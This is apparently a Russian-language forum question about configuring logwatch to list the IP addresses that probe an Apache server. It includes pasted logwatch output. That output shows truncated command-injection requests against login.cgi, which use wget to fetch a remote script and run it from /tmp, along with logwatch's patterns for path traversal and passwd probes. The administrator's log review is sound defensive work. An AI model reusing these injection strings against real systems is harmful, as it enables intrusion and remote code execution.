Как мне заставить logwatch выводить IP-адреса, которые проверяют мой http-сервер? Кажется, что IP-адреса не выводятся, хотя они отображаются в журналах apache.
################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Thu Aug 2 10:08:53 2018
Date Range Processed: yesterday
( 2018-Aug-01 )
Period is day.
Detail Level of Output: 10
Type of Output/Format: stdout / text
Logfiles for Host: ssbl
##################################################################
--------------------- httpd Begin ------------------------
996.79 MB transferred in 66405 responses (1xx 0, 2xx 62932, 3xx 2341, 4xx 1027, 5xx 105)
4775 Images (484.47 MB),
23 Documents (0.05 MB),
66 Archives (0.00 MB),
165 Sound files (17.88 MB),
13024 Content pages (86.44 MB),
1441 Redirects (0.07 MB),
31 Various Logs (0.46 MB),
14 Fonts (1.35 MB),
46866 Other (406.06 MB)
Attempts to use known hacks by 1 hosts were logged 9 time(s) from:
-: 9 Time(s)
passwd$ 5 Time(s)
/\.\./\.\./\.\./ 3 Time(s)
^null$ 1 Time(s)
A total of 1 sites probed the server
-
Requests with error response codes
400 Bad Request
/login.cgi?cli=aa%20aa%27;wget%20http://18 ... h%20/tmp/hk%27$: 1 Time(s)
/login.cgi?cli=aa%20aa%27;wget%20http://46 ... h%20/tmp/hk%27$: 1 Time(s)
/login.cgi?cli=aa%20aa%27;wget%20http://ha ... h%20/tmp/hk%27$: 1 Time(s)
/login.cgi?cli=aa%20aa%27;wget%20http://xo ... 20/tmp/xoxo%27$: 1 Time(s)
401 Unauthorized
/: 47 Time(s)
... и еще тысячи записей.
Формат моего журнала apache:
LogFormat "%h %l %{Host}i %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
Я установил такой же формат внутри services / http.conf